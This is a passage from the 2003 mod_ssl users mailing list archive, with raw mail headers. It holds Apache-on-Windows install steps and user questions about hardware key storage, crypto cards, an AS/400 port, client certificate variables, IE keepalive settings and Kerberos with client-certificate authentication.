early versions of Apache2 had differences with the latest versions.

To install Apache (2.0.xx), follow these simple steps.
(Apache 1.3.xx is similar but different)

1. create a directory (c:\apache) or if you are upgrading, save your
httpd.conf or it could be overwritten.

2. unzip the binaries into this directory - make certain you created the
sub-dirs.

3. go to the conf directory and edit httpd.conf or replace the
httpd.conf with the one you saved.

4. go to the 'bin' directory in a console.

Type the following commands:

- if you are already installed, type 'apache -k uninstall'
- then type 'apache -k install'
- then type 'apache -k start'

Check the error logs if it fails to start, but some configuration errors
will be displayed in your console. Apache also logs to the event log.

If you detect flaws in the build please email me so that I can fix them
as soon as possible. I don't use these binaries so I need you to tell me
if there is something wrong with them. I build a branded version in my
workplace and use Apache2 on Debian/GNU Linux at home.

Configuration questions should be directed to the list after reading the
documentation and searching the list archives - let everyone benefit
from the answers you get.

Chris Lewis


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  5 02:13:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3CB9BA8962; Wed,  5 Nov 2003 02:13:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp013.mail.yahoo.com (smtp013.mail.yahoo.com [216.136.173.57])
	by master.modssl.org (Postfix) with SMTP id 1CC0FA8941
	for ; Wed,  5 Nov 2003 02:12:44 +0100 (CET)
Received: from 12-224-33-78.client.attbi.com (HELO franciscw2rh7k) (francisco?corella@12.224.33.78 with login)
  by smtp.mail.vip.sc5.yahoo.com with SMTP; 5 Nov 2003 01:12:41 -0000
Message-ID: <002e01c3a339$ead7f230$0a00a8c0@franciscw2rh7k>
From: "Francisco Corella" 
To: 
Subject: Providers of hardware key storage
Date: Tue, 4 Nov 2003 17:12:40 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Francisco Corella" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have spent several hours searching the mailing list archive looking for
hardware key storage solutions compatible with mod_ssl.  NCipher provides
one.  Are there any others?  I saw several emails mentioning the existence
of others, but nothing concrete.  One email mentioned Broadcom in addition
to NCipher, but Broadcom sells chips, and I'm looking for a PCI card.  I
have concacted several manufacturers of SSL accelerators but haven't been
able to get any answers concerning key storage except from NCipher.

Thanks for any help,

Francisco



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  6 19:40:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C17DCA8943; Thu,  6 Nov 2003 19:40:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from aples1.jhuapl.edu (aples1.dom1.jhuapl.edu [128.244.26.85])
	by master.modssl.org (Postfix) with ESMTP id 2D24EA8933
	for ; Thu,  6 Nov 2003 19:40:25 +0100 (CET)
Received: by aples1.dom1.jhuapl.edu with Internet Mail Service (5.5.2653.19)
	id ; Thu, 6 Nov 2003 13:39:51 -0500
Message-ID: 
From: "Yu, Ming" 
To: "'modssl-users@modssl.org'" 
Subject: mod_ssl and Sun Crypto Card
Date: Thu, 6 Nov 2003 13:40:21 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yu, Ming" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a SunFire system that has a Sun Crypto Card 1000 pre-installed.  The
mod_ssl came with the card only supports apache 1.3.12 or apache 1.3.22.
How to configure and compile the mod_ssl so that it can support the Crypto
card?  - Thanks in advance

- Ming Yu
- Johns Hopkins Univ. APL

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  6 20:43:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 752AFA8943; Thu,  6 Nov 2003 20:43:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic2.trustcenter.de (mystic2.trustcenter.de [193.194.157.50])
	by master.modssl.org (Postfix) with ESMTP id B1595A8933
	for ; Thu,  6 Nov 2003 20:43:30 +0100 (CET)
Received: (from uucp@localhost)
	by mystic2.trustcenter.de (8.11.7+Sun/8.11.7) id hA6JhTs09273
	for ; Thu, 6 Nov 2003 20:43:29 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic2.trustcenter.de via csmap (V6.0)
	id srcAAAEOaahs; Thu, 6 Nov 03 20:43:28 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.12.9/TC TrustCenter Mailserver) with ESMTP id hA6JhQMv015593
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Thu, 6 Nov 2003 20:43:28 +0100
Message-ID: <3FAAA45E.5020003@trustcenter.de>
Date: Thu, 06 Nov 2003 20:43:26 +0100
From: Goetz Babin-Ebell 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Providers of hardware key storage
References: <002e01c3a339$ead7f230$0a00a8c0@franciscw2rh7k>
In-Reply-To: <002e01c3a339$ead7f230$0a00a8c0@franciscw2rh7k>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms030104020201080408060804"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Goetz Babin-Ebell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms030104020201080408060804
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Francisco,

Francisco Corella wrote:
> I have spent several hours searching the mailing list archive looking for
> hardware key storage solutions compatible with mod_ssl.  NCipher provides
> one.  Are there any others?  I saw several emails mentioning the existence
> of others, but nothing concrete.  One email mentioned Broadcom in addition
> to NCipher, but Broadcom sells chips, and I'm looking for a PCI card.  I
> have concacted several manufacturers of SSL accelerators but haven't been
> able to get any answers concerning key storage except from NCipher.

OpenSSL comes with build in support for different
crypto hardware (called ENGINE, in crypto/engine/).
But support for additional crypto engines may be added on run time.

Please search the OpenSSL web pages.

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms030104020201080408060804
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMTEwNjE5NDMyNlow
IwYJKoZIhvcNAQkEMRYEFPpazqCqB84gyZOLqz9xgln/h0KtMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAJ1jWEE30S7PbzIAvKNr1cRD+boPANW3rwS0ivX4oh09cOvr299HtUPR+lS74WzX1u6LE
Slw2j1p7nF5t64jX309JQ2cPu3WNwWbRiaXiRLFESiCuU2pXXAayRdW/GMMdiF4uBH8ll8UX
tlggA4rZnP8vaYf/iMCOASUCGaUteVfRCkG7qsTNe2LQRpczoryeB+rZ/+eTP3ep3CncppOn
eB8LED2Imfdo3KdMWCozvIxHxV88NCadCZiAot/2Cfv2yZMEBBm0jyeeC9EjHEX9aNL4wSq5
6Wr33z4IF5jNg8EeuwalDW4nGF3LTlSyqGmGjPI4lz8F2l7KTA1sU5s1GAAAAAAAAA==
--------------ms030104020201080408060804--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  6 21:43:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A793BA8972; Thu,  6 Nov 2003 21:43:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scgis.com (www.scgis.com [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id C12CAA8933
	for ; Thu,  6 Nov 2003 21:43:27 +0100 (CET)
Received: from crash ([68.16.197.34])
	by scgis.com (8.12.10/8.12.9) with SMTP id hA6KhPO0068959
	for ; Thu, 6 Nov 2003 15:43:25 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <006901c3a4a7$2104eb10$0301010a@crash>
From: "C Davis" 
To: 
Subject: ModSSL on AS/400?
Date: Thu, 6 Nov 2003 15:47:00 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0066_01C3A47D.37BC4B20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0066_01C3A47D.37BC4B20
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

 Is there a modssl port to the IBM as/400? I've a perl cgi that I've =
been asked if I can port
 to this platform.

 Thanks, CD

 
------=_NextPart_000_0066_01C3A47D.37BC4B20
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


 


 Is there a modssl port to the IBM =
as/400?=20
I've a perl cgi that I've been asked if I can port


 to this platform.


 


 Thanks, CD


 


 


------=_NextPart_000_0066_01C3A47D.37BC4B20--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  8 05:24:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B616AA8948; Sat,  8 Nov 2003 05:24:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp102.mail.sc5.yahoo.com (smtp102.mail.sc5.yahoo.com [216.136.174.140])
	by master.modssl.org (Postfix) with SMTP id 9E8C9A8933
	for ; Sat,  8 Nov 2003 05:23:51 +0100 (CET)
Received: from 12-224-33-78.client.attbi.com (HELO franciscw2rh7k) (francisco?corella@12.224.33.78 with login)
  by smtp.mail.vip.sc5.yahoo.com with SMTP; 8 Nov 2003 04:23:44 -0000
Message-ID: <002601c3a5b0$1aa7fd70$0a00a8c0@franciscw2rh7k>
From: "Francisco Corella" 
To: 
References: 
Subject: Re: Providers of hardware key storage
Date: Fri, 7 Nov 2003 20:23:46 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Francisco Corella" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Goetz,

> Francisco Corella wrote:
> > I have spent several hours searching the mailing list archive looking
for
> > hardware key storage solutions compatible with mod_ssl.  NCipher
provides
> > one.  Are there any others?  I saw several emails mentioning the
existence
> > of others, but nothing concrete.  One email mentioned Broadcom in
addition
> > to NCipher, but Broadcom sells chips, and I'm looking for a PCI card.  I
> > have concacted several manufacturers of SSL accelerators but haven't
been
> > able to get any answers concerning key storage except from NCipher.
>
> OpenSSL comes with build in support for different
> crypto hardware (called ENGINE, in crypto/engine/).
> But support for additional crypto engines may be added on run time.
>
> Please search the OpenSSL web pages.

I think I understand, at least in principle, how to use hardware crypto with
mod_ssl.  But there are two ways of doing it, depending of where you keep
the server key:

(a) You may keep the server key in a file specified by the directive
SSLCertificateKeyFile, and send the key to the hardware for each operation
that requires use of the key.  Or,

(b) You may keep the server key in the hardware, and tell the hardware what
key to use for each operation in some ad-hoc fashion.

My understanding is that most hardware crypto uses option (a).  I know that
nCipher lets you use option (a) or option (b), but using option (b) requires
buying the tamperproof card called "nForce", which is very expensive,
instead of the vanilla "nFast" card.

What I was asking is whether there is other crypto hardware out there that
lets you use option (b).  I'm hoping to find something less expensive than
nForce.

Francisco


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  9 22:02:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8601EA8973; Sun,  9 Nov 2003 22:02:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.pair.com (relay.pair.com [209.68.1.20])
	by master.modssl.org (Postfix) with SMTP id 2C928A893F
	for ; Sun,  9 Nov 2003 22:02:03 +0100 (CET)
Received: (qmail 65288 invoked from network); 9 Nov 2003 21:02:00 -0000
Received: from unknown (HELO holotech-4edh67) (65.217.105.234)
  by relay.pair.com with SMTP; 9 Nov 2003 21:02:00 -0000
X-pair-Authenticated: 65.217.105.234
Date: Sun, 9 Nov 2003 16:01:59 -0500
From: modssl@holotech.net
X-Mailer: The Bat! (v1.60q) Personal
Organization: Holotech Enterprises
X-Priority: 3 (Normal)
Message-ID: <1323000604.20031109160159@holotech.net>
To: modssl-users@modssl.org
Subject: Client Info
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@holotech.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I aplogize if this is a re-send. I never heard anything back about it,
and it seems like a pretty simple question, so I don't know if my
message went out to the list.

The SSL_CLIENT_* variables are not appearing in my environment. My web
host insists it's something my CGI needs to do to request this
information from the client, but that doesn't make sense to me. I
obtained a certificate from Thawte and installed it in my browser, but
that doesn't make a difference. Is there something else I need to do?
Is there something my host needs to do?

-- 
Alan Little
Holotech Enterprises

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 10 09:21:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2C28A895E; Mon, 10 Nov 2003 09:21:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id 50CAFA8933
	for ; Mon, 10 Nov 2003 09:21:42 +0100 (CET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by gamay.kronodoc.fi (Postfix) with ESMTP id 653021400B
	for ; Mon, 10 Nov 2003 10:21:40 +0200 (EET)
Received: from gamay.kronodoc.fi ([127.0.0.1])
 by localhost (gamay.kronodoc.fi [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 04962-03-6 for ;
 Mon, 10 Nov 2003 10:21:39 +0200 (EET)
Received: from ws3.kronodoc.fi (ws3.kronodoc.fi [195.255.175.131])
	by gamay.kronodoc.fi (Postfix) with ESMTP id D06F814009
	for ; Mon, 10 Nov 2003 10:21:38 +0200 (EET)
Subject: MS IE & nokeepalive + downgrade-1.0
From: "aspa@kronodoc.fi" 
To: modssl-users@modssl.org
Content-Type: text/plain
Organization: 
Message-Id: <1068452497.23050.52.camel@ws3.kronodoc.fi>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) 
Date: 10 Nov 2003 10:21:38 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new/F-Secure Antivirus at mail.kronodoc.fi
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "aspa@kronodoc.fi" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi

i've a web application that uses NTLM over HTTP authentication. i had to
remove the nokeepalive and downgrade-1.0 directives from the mod_ssl
configuration in order to make this application work over SSL/TLS. the
modified configuration works with MS IE v6.0 on XP SP1 but can someone
tell me which IE versions i should expect to be negatively affected by
this modification? i'm especially interested in MS IE versions 5.55 and
up on NT4 SP6a and XP SP1.

best regards,
-- 
	aspa						http://www.kronodoc.fi/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 10 12:59:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 99D8EA895E; Mon, 10 Nov 2003 12:59:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from neuron.admin.healthnet.lu (drill.healthnet.lu [158.64.36.2])
	by master.modssl.org (Postfix) with ESMTP id 1C435A8933
	for ; Mon, 10 Nov 2003 12:59:31 +0100 (CET)
Received: from control.dmz.chl.lu ([10.11.1.10])
	by neuron.admin.healthnet.lu (8.9.3/8.8.8) with SMTP id MAA12668
	for ; Mon, 10 Nov 2003 12:58:59 +0100 (MET)
Received: from 172.20.1.146 by control.dmz.chl.lu (InterScan E-Mail VirusWall NT); Mon, 10 Nov 2003 12:55:09 +0100
Received: from samara.atlantis.local by woodstock.inf.chl.lu (8.8.8/1.1.22.3/16Mar00-0417PM)
	id MAA0000029620; Mon, 10 Nov 2003 12:58:59 +0100 (MET)
Date: Mon, 10 Nov 2003 12:58:33 +0100
From: Daniel Struck 
To: modssl-users@modssl.org
Subject: mod_ssl & kerberos ?
Message-Id: <20031110125833.1087f239.community@struck.lu>
X-Mailer: Sylpheed version 0.9.6claws (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Struck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,


I want to ask if the following setup is possible:


Clients will be authenticated towards apache with x509 certificates (mod_ss=
l).

Would it now be possible to give authenticated clients a kerberos ticket wh=
ich could be read out in php/perl?
I would like to use this ticket to authenticate the client towards a databa=
se like postgresql.

(Background: In my web application a use postgresql, where I will write rul=
es which automatically log certain actions of the client like update or del=
ete queries. So I do need every client to be loged in the database with a d=
ifferent name, but I don't want to store the usernames & userpasswords in a=
 file accessible to php, nor do I want to do the logging in php. I want to =
move as much logic as possible to the database, which will make it easier i=
n future to change the interface from php to java for example.)


Best regards,

Daniel Struck

--=20
Retrovirology Laboratory Luxembourg
Centre Hospitalier de Luxembourg
4, rue E. Barbl=E9
L-1210 Luxembourg

phone: +352-44116105
fax:   +352-44116113
web: http://www.retrovirology.lu
e-mail: struck.d@retrovirology.lu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 10 17:38:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 74AC0A8971; Mon, 10 Nov 2003 17:38:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id C0481A8933
	for ; Mon, 10 Nov 2003 17:38:27 +0100 (CET)
Received: (from root@localhost)
